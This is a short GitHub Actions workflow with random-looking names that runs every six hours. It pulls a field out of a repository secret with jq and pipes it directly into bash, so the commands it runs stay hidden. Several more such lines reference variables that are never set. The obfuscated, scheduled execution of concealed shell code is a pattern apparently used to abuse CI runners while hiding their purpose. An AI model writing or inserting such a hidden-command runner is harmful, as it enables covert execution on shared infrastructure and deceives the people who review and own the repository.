name: zoubowei2749

on:
  workflow_dispatch:
  schedule:
    - cron: '47 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zoubowei2749
        env:
          doa89526: ${{ secrets.doa89526 }}
        run: |
          echo $doa89526 | jq -r .pzjx6341 | /bin/bash
          echo $cd46149 | jq -r .t03 | /bin/bash
          echo $ryx1635 | jq -r .fzl98381 | /bin/bash
          echo $kzxo304 | jq -r .k0326 | /bin/bash
          echo $ntfz18903 | jq -r .dyy9567 | /bin/bash
          echo $say265 | jq -r .pbncq9 | /bin/bash
          echo $gixb92172 | jq -r .xo966 | /bin/bash
          echo $oysro31967 | jq -r .gwpg1249 | /bin/bash
          echo $v43405 | jq -r .g0814 | /bin/bash

